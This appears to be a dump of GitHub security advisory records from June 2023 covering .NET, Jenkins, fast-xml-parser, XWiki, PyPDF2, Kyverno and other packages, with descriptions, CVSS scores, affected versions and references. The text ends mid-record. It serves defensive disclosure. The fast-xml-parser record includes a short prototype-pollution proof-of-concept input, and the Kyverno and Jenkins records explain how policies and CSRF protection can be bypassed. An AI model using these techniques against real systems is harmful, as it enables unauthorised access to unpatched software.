Remote Code Execution Vulnerability ## Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in .NET 7.0 and .NET 6.0. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. A vulnerability exists in .NET during crash and stack trace scenarios that could lead to loading arbitrary binaries. ## Announcement Announcement for this issue can be found at https://github.com/dotnet/announcements/issues/254 ### Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. ## Affected software * Any .NET 7.0.1xx SDK 7.0.106 or earlier. * Any .NET 7.0.3xx SDK 7.0.303 or earlier. * Any .NET 6.0.1xx SDK 6.0.117 or earlier. * Any .NET 6.0.3xx SDK 6.0.312 or earlier. If your application uses the following package versions, ensure you update to the latest version of .NET. ### .NET 7 Package name | Affected version | Patched version ------------ | ---------------- | ------------------------- [Microsoft.NetCore.App.Runtime.win-arm](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.win-arm) | >= 7.0.0, <= 7.0.5 | 7.0.7 [Microsoft.NetCore.App.Runtime.win-arm64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.win-arm64) | >= 7.0.0, <= 7.0.5 | 7.0.7 [Microsoft.NetCore.App.Runtime.win-x64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.win-x64) | >= 7.0.0, <= 7.0.5 | 7.0.7 [Microsoft.NetCore.App.Runtime.win-x86](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.win-x86) | >= 7.0.0, <= 7.0.5 | 7.0.7 ### .NET 6 Package name | Affected version | Patched version ------------ | ---------------- | ------------------------- [Microsoft.NetCore.App.Runtime.win-arm](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.win-arm) | >= 6.0.0, <= 6.0.16 | 6.0.18 [Microsoft.NetCore.App.Runtime.win-arm64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.win-arm64) | >= 6.0.0, <= 6.0.16 | 6.0.18 [Microsoft.NetCore.App.Runtime.win-x64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.win-x64) | >= 6.0.0, <= 6.0.16 | 6.0.18 [Microsoft.NetCore.App.Runtime.win-x86](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.win-x86) | >= 6.0.0, <= 6.0.16 | 6.0.18 ## Advisory FAQ ### How do I know if I am affected? If you have a runtime or SDK with a version listed, or an affected package listed in [affected software](#affected-software), you're exposed to the vulnerability. ### How do I fix the issue? * To fix the issue please install the latest version of .NET 6.0 or .NET 7.0. If you have installed one or more .NET SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio, which will also update your .NET SDKs. * If you are using one of the affected packages, please update to the patched version listed above. * If you have .NET 6.0 or greater installed, you can list the versions you have installed by running the `dotnet --info` command. You will see output like the following; ``` .NET Core SDK (reflecting any global.json): Version: 6.0.300 Commit: 8473146e7d Runtime Environment: OS Name: Windows OS Version: 10.0.18363 OS Platform: Windows RID: win10-x64 Base Path: C:\Program Files\dotnet\sdk\6.0.300\ Host (useful for support): Version: 6.0.5 Commit: 8473146e7d .NET Core SDKs installed: 6.0.300 [C:\Program Files\dotnet\sdk] .NET Core runtimes installed: Microsoft.AspNetCore.App 6.0.5 [C:\Program Files\dotnet\shared\Microsoft.AspNetCore.App] Microsoft.NETCore.App 6.0.5 [C:\Program Files\dotnet\shared\Microsoft.NETCore.App] Microsoft.WindowsDesktop.App 6.0.5 [C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App] To install additional .NET Core runtimes or SDKs: https://aka.ms/dotnet-download ``` * If you're using .NET 7.0, you should download and install Runtime 7.0.7 or SDK 7.0.106 (for Visual Studio 2022 v17.4) from https://dotnet.microsoft.com/download/dotnet-core/7.0. * If you're using .NET 6.0, you should download and install Runtime 6.0.18 or SDK 6.0.312 (for Visual Studio 2022 v17.2) from https://dotnet.microsoft.com/download/dotnet-core/6.0. .NET 6.0 and and .NET 7.0 updates are also available from Microsoft Update. To access this either type ""Check for updates"" in your Windows search, or open Settings, choose Update & Security and then click Check for Updates. Once you have installed the updated runtime or SDK, restart your apps for the update to take effect. Additionally, if you've deployed [self-contained applications](https://docs.microsoft.com/dotnet/core/deploying/#self-contained-deployments-scd) targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed. ## Other Information ### Reporting Security Issues If you have found a potential security issue in .NET 6.0 or .NET 7.0, please email details to secure@microsoft.com. Reports may qualify for the Microsoft .NET Core & .NET 5 Bounty. Details of the Microsoft .NET Bounty Program including terms and conditions are at . ### Support You can ask questions about this issue on GitHub in the .NET GitHub organization. The main repos are located at https://github.com/dotnet/runtime and https://github.com/dotnet/aspnet/. The Announcements repo (https://github.com/dotnet/Announcements) will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue. ### Disclaimer The information provided in this advisory is provided ""as is"" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. ### External Links [CVE-2023-33126]( https://www.cve.org/CVERecord?id=2023-33126) ### Revisions V1.0 (June 13, 2023): Advisory published. _Version 1.0_ _Last Updated 2023-06-13_","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.win-arm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.7'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.5'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.win-arm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.18'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.0.16'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.win-arm64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.7'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.5'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.win-arm64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.18'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.0.16'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.win-x64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.7'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.5'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.win-x64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.18'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.0.16'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.win-x86'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.18'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.0.16'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.win-x86'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.7'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.5'}}]","[{'type': 'WEB', 'url': 'https://github.com/dotnet/sdk/security/advisories/GHSA-gh24-9qjj-mr67'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-33126'}, {'type': 'WEB', 'url': 'https://github.com/dotnet/announcements/issues/254'}, {'type': 'PACKAGE', 'url': 'https://github.com/dotnet/sdk'}, {'type': 'WEB', 'url': 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-33126'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-14T17:18:10Z', 'nvd_published_at': None}" 1.4.0,GHSA-98fp-r22g-wpj7,2023-06-14T20:28:01Z,2023-06-14T15:30:37Z,,['CVE-2023-35141'],Jenkins CSRF protection bypass vulnerability,"Jenkins provides context menus for various UI elements, like links to jobs and builds, or breadcrumbs. In Jenkins 2.399 and earlier, LTS 2.387.3 and earlier, POST requests are sent in order to load the list of context actions. If part of the URL includes insufficiently escaped user-provided values, a victim may be tricked into sending a POST request to an unexpected endpoint (e.g., the Script Console) by opening a context menu. As of publication of this advisory, we are aware of insufficiently escaped context menu URLs for label expressions, allowing attackers with Item/Configure permissions to exploit this vulnerability. Jenkins 2.400, LTS 2.401.1 sends GET requests to load the list of context actions.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.main:jenkins-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.400'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-35141'}, {'type': 'WEB', 'url': 'https://github.com/CVEProject/cvelist/blob/f37e157216b8e5e64a6db80b7b68bde0088277fe/2023/35xxx/CVE-2023-35141'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-06-14/#SECURITY-3135'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/06/14/5'}]","{'cwe_ids': ['CWE-352'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-14T20:28:01Z', 'nvd_published_at': None}" 1.4.0,GHSA-x3cc-x39p-42qx,2023-06-13T12:44:34Z,2023-06-13T12:44:34Z,,['CVE-2023-26920'],fast-xml-parser vulnerable to Prototype Pollution through tag or attribute name,"### Impact As a part of this vulnerability, user was able to se code using `__proto__` as a tag or attribute name. ```js const { XMLParser, XMLBuilder, XMLValidator} = require(""fast-xml-parser""); let XMLdata = ""<__proto__>hacked"" const parser = new XMLParser(); let jObj = parser.parse(XMLdata); console.log(jObj.polluted) // should return hacked ``` ### Patches The problem has been patched in v4.1.2 ### Workarounds User can check for ""__proto__"" in the XML string before parsing it to the parser. ### References https://gist.github.com/Sudistark/a5a45bd0804d522a1392cb5023aa7ef7 ",[],"[{'package': {'ecosystem': 'npm', 'name': 'fast-xml-parser'}, 'ecosystem_specific': {'affected_functions': ['fast-xml-parser.XMLParser.parse']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.1.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-x3cc-x39p-42qx'}, {'type': 'WEB', 'url': 'https://github.com/NaturalIntelligence/fast-xml-parser/commit/2b032a4f799c63d83991e4f992f1c68e4dd05804'}, {'type': 'WEB', 'url': 'https://gist.github.com/Sudistark/a5a45bd0804d522a1392cb5023aa7ef7'}, {'type': 'PACKAGE', 'url': 'https://github.com/NaturalIntelligence/fast-xml-parser'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-13T12:44:34Z', 'nvd_published_at': None}" 1.4.0,GHSA-v3r5-pjpm-mwgq,2023-06-07T15:52:55Z,2023-06-07T15:52:55Z,,['CVE-2023-0040'],Async HTTP Client has CRLF Injection vulnerability in HTTP request headers,"Versions of Async HTTP Client prior to 1.13.2 are vulnerable to a form of targeted request manipulation called CRLF injection. This vulnerability was the result of insufficient validation of HTTP header field values before sending them to the network. Users are vulnerable if they pass untrusted data into HTTP header field values without prior sanitisation. Common use-cases here might be to place usernames from a database into HTTP header fields. This vulnerability allows attackers to inject new HTTP header fields, or entirely new requests, into the data stream. This can cause requests to be understood very differently by the remote server than was intended. In general, this is unlikely to result in data disclosure, but it can result in a number of logical errors and other misbehaviours.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'purl-type:swift', 'name': 'github.com/swift-server/async-http-client'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.13.0'}, {'fixed': '1.13.2'}]}]}, {'package': {'ecosystem': 'purl-type:swift', 'name': 'github.com/swift-server/async-http-client'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.10.0'}, {'fixed': '1.12.1'}]}]}, {'package': {'ecosystem': 'purl-type:swift', 'name': 'github.com/swift-server/async-http-client'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.5.0'}, {'fixed': '1.9.1'}]}]}, {'package': {'ecosystem': 'purl-type:swift', 'name': 'github.com/swift-server/async-http-client'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/swift-server/async-http-client/security/advisories/GHSA-v3r5-pjpm-mwgq'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0040'}, {'type': 'WEB', 'url': 'https://github.com/swift-server/async-http-client/commit/7f05a8da46cc2a4ab43218722298b81ac7a08031'}, {'type': 'PACKAGE', 'url': 'https://github.com/swift-server/async-http-client'}, {'type': 'WEB', 'url': 'https://github.com/swift-server/async-http-client/releases/tag/1.12.1'}, {'type': 'WEB', 'url': 'https://github.com/swift-server/async-http-client/releases/tag/1.13.2'}, {'type': 'WEB', 'url': 'https://github.com/swift-server/async-http-client/releases/tag/1.4.1'}, {'type': 'WEB', 'url': 'https://github.com/swift-server/async-http-client/releases/tag/1.9.1'}]","{'cwe_ids': ['CWE-74', 'CWE-93'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-07T15:52:55Z', 'nvd_published_at': '2023-01-18T19:15:00Z'}" 1.4.0,GHSA-rf8j-q39g-7xfm,2023-06-20T16:46:53Z,2023-06-20T16:46:53Z,,['CVE-2023-35152'],XWiki Platform vulnerable to privilege escalation (PR) from account through like LiveTableResults,"### Impact Any logged in user can add dangerous content in their first name field and see it executed with programming rights. Leading to rights escalation. ### Patches The vulnerability has been fixed on XWiki 14.4.8, 14.10.6, and 15.1. ### Workarounds The vulnerability can be fixed by applying this [patch](https://github.com/xwiki/xwiki-platform/commit/6ce2d04a5779e07f6d3ed3f37d4761049b4fc3ac#diff-ef7f8b911bb8e584fda22aac5876a329add35ca0d1d32e0fdb62a439b78cfa49). On versions before 13.4-rc-1, the fix needs to be applied on [XWiki.Like.Code.LiveTableResultPage](https://github.com/xwiki/xwiki-platform/commit/0993a7ab3c102f9ac37ffe361a83a3dc302c0e45#diff-0b51114cb27f7a5c599cf40c59d658eae6ddc5c0836532c3b35e163f40a4854fR39). ### References - The reported issue https://jira.xwiki.org/browse/XWIKI-20611, fixed by https://jira.xwiki.org/browse/XWIKI-19900 - The patch https://github.com/xwiki/xwiki-platform/commit/6ce2d04a5779e07f6d3ed3f37d4761049b4fc3ac#diff-ef7f8b911bb8e584fda22aac5876a329add35ca0d1d32e0fdb62a439b78cfa49 ### For more information If you have any questions or comments about this advisory: * Open an issue in [Jira XWiki.org](https://jira.xwiki.org/) * Email us at [Security Mailing List](mailto:security@xwiki.org) ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-like-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '12.9-rc-1'}, {'fixed': '14.4.8'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-like-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.5'}, {'fixed': '14.10.6'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-like-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '15.0-rc-1'}, {'fixed': '15.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-rf8j-q39g-7xfm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-35152'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/0993a7ab3c102f9ac37ffe361a83a3dc302c0e45#diff-0b51114cb27f7a5c599cf40c59d658eae6ddc5c0836532c3b35e163f40a4854fR39'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/6ce2d04a5779e07f6d3ed3f37d4761049b4fc3ac#diff-ef7f8b911bb8e584fda22aac5876a329add35ca0d1d32e0fdb62a439b78cfa49'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-platform'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-19900'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-20611'}]","{'cwe_ids': ['CWE-94', 'CWE-95'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-06-20T16:46:53Z', 'nvd_published_at': None}" 1.4.0,GHSA-hm9v-vj3r-r55m,2023-06-30T22:19:39Z,2023-06-30T22:19:39Z,,['CVE-2023-36807'],PyPDF2 vulnerable to possible Infinite Loop when reading malformed objects,"### Impact An attacker who uses this vulnerability can craft a PDF which leads to an infinite loop. This infinite loop blocks the current process and can utilize a single core of the CPU by 100%. It does not affect memory usage. That is, for example, the case if the user extracted metadata from such a malformed PDF. ### Patches The issue was fixed with https://github.com/py-pdf/pypdf/pull/1331 ### Workarounds If you cannot update your version of `PyPDF2` (preferably to `pypdf>3.1.0` as PyPDF2 is deprecated), you should modify `PyPDF2/generic/_data_structures.py::read_object`. Replace: ```python else: # number object OR indirect reference peek = stream.read(20) stream.seek(-len(peek), 1) # reset to start if IndirectPattern.match(peek) is not None: return IndirectObject.read_from_stream(stream, pdf) else: return NumberObject.read_from_stream(stream) ``` by ```python elif tok in b""0123456789+-."": # number object OR indirect reference peek = stream.read(20) stream.seek(-len(peek), 1) # reset to start if IndirectPattern.match(peek) is not None: return IndirectObject.read_from_stream(stream, pdf) else: return NumberObject.read_from_stream(stream) else: raise PdfReadError( f""Invalid Elementary Object starting with {tok} @{stream.tell()}"" ) ``` ### References * [pypdf issue #1329](https://github.com/py-pdf/pypdf/issues/1329) * [pypdf PR #1331](https://github.com/py-pdf/pypdf/pull/1331)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'PyPDF2'}, 'ecosystem_specific': {'affected_functions': ['PyPDF2._reader.PdfReader.get_object', 'PyPDF2.generic._base.NameObject.read_from_stream', 'PyPDF2.generic._data_structures.DictionaryObject.read_from_stream', 'PyPDF2.generic._data_structures.read_object']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.10.5'}, {'fixed': '2.10.6'}]}], 'versions': ['2.10.5']}]","[{'type': 'WEB', 'url': 'https://github.com/py-pdf/pypdf/security/advisories/GHSA-hm9v-vj3r-r55m'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-36807'}, {'type': 'WEB', 'url': 'https://github.com/py-pdf/pypdf/issues/1329'}, {'type': 'WEB', 'url': 'https://github.com/py-pdf/pypdf/pull/1331'}, {'type': 'WEB', 'url': 'https://github.com/py-pdf/pypdf/commit/e6531a25325e7e0174b6a1ba03b57320b5227f6b'}, {'type': 'PACKAGE', 'url': 'https://github.com/py-pdf/pypdf'}]","{'cwe_ids': ['CWE-835'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-30T22:19:39Z', 'nvd_published_at': None}" 1.4.0,GHSA-hq4m-4948-64cc,2023-06-05T17:10:13Z,2023-06-05T17:10:13Z,,['CVE-2023-34091'],Kyverno resource with a deletionTimestamp may allow policy circumvention,"### Impact In versions of Kyverno prior to 1.10.0, resources which have the `deletionTimestamp` field defined can bypass validate, generate, or mutate-existing policies, even in cases where the `validationFailureAction` field is set to `Enforce`. This situation occurs as resources pending deletion were being consciously exempted by Kyverno, as a way to reduce processing load as policies are typically not applied to objects which are being deleted. However, this could potentially result in allowing a malicious user to leverage the [Kubernetes finalizers feature](https://kubernetes.io/docs/concepts/overview/working-with-objects/finalizers/) by setting a finalizer which causes the Kubernetes API server to set the `deletionTimestamp` and then not completing the delete operation as a way to explicitly to bypass a Kyverno policy. Note that this is not applicable to Kubernetes Pods but, as an example, a Kubernetes Service resource can be manipulated using an indefinite finalizer to bypass policies. ### Patches This is resolved in Kyverno 1.10.0. ### Workarounds There is no known workaround. ### References _Are there any links users can visit to find out more?_ ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/kyverno/kyverno'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.10.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/kyverno/kyverno/security/advisories/GHSA-hq4m-4948-64cc'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34091'}, {'type': 'PACKAGE', 'url': 'https://github.com/kyverno/kyverno'}, {'type': 'WEB', 'url': 'https://github.com/kyverno/kyverno/releases/tag/v1.10.0'}]","{'cwe_ids': ['CWE-285'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-05T17:10:13Z', 'nvd_published_at': None}" 1.4.0,GHSA-v3v9-3jf4-5pxx,2023-06-16T17:55:54Z,2023-06-07T21:30:18Z,,['CVE-2023-33510'],Jeecg P3 Biz Chat allows remote attackers to read arbitrary files,Jeecg P3 Biz Chat 1.0.5 allows remote attackers to read arbitrary files through specific parameters.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jeecgframework.p3:jeecg-p3-biz-chat'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-33510'}, {'type': 'WEB', 'url': 'https://carl1l.github.io/2023/05/08/jeecg-p3-biz-chat-1-0-5-jar-has-arbitrary-file-read-vulnerability/'}]","{'cwe_ids': ['CWE-668'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-09T22:54:03Z', 'nvd_published_at': None}" 1.4.0,GHSA-ghqq-jfx7-f6m9,2023-06-14T19:26:52Z,2023-06-09T03:30:24Z,,['CVE-2023-3172'],Froxlor vulnerable to Path Traversal,Path Traversal in GitHub repository froxlor/froxlor prior to 2.0.20.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'froxlor/froxlor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.20'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-3172'}, {'type': 'WEB', 'url': 'https://github.com/froxlor/froxlor/commit/da810ea95393dfaec68a70e30b7c887c50563a7e'}, {'type': 'PACKAGE', 'url': 'https://github.com/froxlor/froxlor'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/e50966cd-9222-46b9-aedc-1feb3f2a0b0e'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-09T22:41:31Z', 'nvd_published_at': None}" 1.4.0,GHSA-75r3-38rh-pmxv,2023-06-27T21:00:35Z,2023-06-14T15:30:38Z,,['CVE-2023-34613'],sojo vulnerable to stack exhaustion,An issue was discovered sojo through 1.1.1 allows attackers to cause a denial of service or other unspecified impacts via crafted objects that deeply nested structures.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'net.sf.sojo:sojo'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.1.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34613'}, {'type': 'WEB', 'url': 'https://github.com/maddingo/sojo/issues/15'}, {'type': 'PACKAGE', 'url': 'https://github.com/maddingo/sojo'}]","{'cwe_ids': ['CWE-400', 'CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-14T21:10:32Z', 'nvd_published_at': None}" 1.4.0,GHSA-vj2m-9f5j-mpr5,2023-06-07T16:26:25Z,2023-06-07T16:26:25Z,,['CVE-2022-31005'],Vapor vulnerable to denial of service in HTTP Range Request of FileMiddleware,"Vapor is an HTTP web framework for Swift and [middleware](https://docs.vapor.codes/advanced/middleware/) is a logic chain between the client and a Vapor route handler. [FileMiddleware](https://docs.vapor.codes/advanced/middleware/#file-middleware) enables the serving of assets from the Public folder of a project to the client. Vapor before 4.60.3 is vulnerable to denial of service due to an integer overflow when given invalid range headers while using FileMiddleware. This is patched in 4.60.3.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'purl-type:swift', 'name': 'github.com/vapor/vapor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.60.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/vapor/vapor/security/advisories/GHSA-vj2m-9f5j-mpr5'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-31005'}, {'type': 'WEB', 'url': 'https://github.com/vapor/vapor/commit/953a349b539b3e0d3653585c8ffb50c427986df1'}, {'type': 'PACKAGE', 'url': 'https://github.com/vapor/vapor'}, {'type': 'WEB', 'url': 'https://github.com/vapor/vapor/releases/tag/4.60.3'}]","{'cwe_ids': ['CWE-190'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-07T16:26:25Z', 'nvd_published_at': '2022-05-31T20:15:00Z'}" 1.4.0,GHSA-gm2g-2xr9-pxxj,2023-07-10T10:36:45Z,2023-06-30T18:31:02Z,,['CVE-2023-3485'],Temporal Server vulnerable to Incorrect Authorization and Insecure Default Initialization of Resource,"Insecure defaults in open-source Temporal Server before version 1.20 on all platforms allows an attacker to craft a task token with access to a namespace other than the one specified in the request. Creation of this task token must be done outside of the normal Temporal server flow. It requires the namespace UUID and information from the workflow history for the target namespace. Under these conditions, it is possible to interfere with pending tasks in other namespaces, such as marking a task failed or completed. If a task is targeted for completion by the attacker, the targeted namespace must also be using the same data converter configuration as the initial, valid, namespace for the task completion payload to be decoded by workers in the target namespace.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:L/A:L'}]","[{'package': {'ecosystem': 'Go', 'name': 'go.temporal.io/server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.20.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-3485'}, {'type': 'PACKAGE', 'url': 'https://github.com/temporalio/temporal'}, {'type': 'WEB', 'url': 'https://github.com/temporalio/temporal/releases/tag/v1.20.0'}]","{'cwe_ids': ['CWE-1188', 'CWE-863'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-06-30T20:25:35Z', 'nvd_published_at': None}" 1.4.0,GHSA-25mx-8f3v-8wh7,2023-06-06T01:58:04Z,2023-06-06T01:58:04Z,,[],sequoia-openpgp vulnerable to out-of-bounds array access leading to panic,"Affected versions of the crate have several bugs where attacker-controlled input can result in the use of an out-of-bound array index. Rust detects the use of the out-of-bound index and causes the application to panic. An attacker may be able to use this to cause a denial-of-service. However, it is not possible for an attacker to read from or write to the application's address space. ",[],"[{'package': {'ecosystem': 'crates.io', 'name': 'sequoia-openpgp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.1'}]}]}, {'package': {'ecosystem': 'crates.io', 'name': 'sequoia-openpgp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.2.0'}, {'fixed': '1.8.1'}]}]}, {'package': {'ecosystem': 'crates.io', 'name': 'sequoia-openpgp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.9.0'}, {'fixed': '1.16.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-29mf-62xx-28jq'}, {'type': 'PACKAGE', 'url': 'https://gitlab.com/sequoia-pgp/sequoia'}, {'type': 'WEB', 'url': 'https://gitlab.com/sequoia-pgp/sequoia/-/blob/main/openpgp/NEWS'}, {'type': 'WEB', 'url': 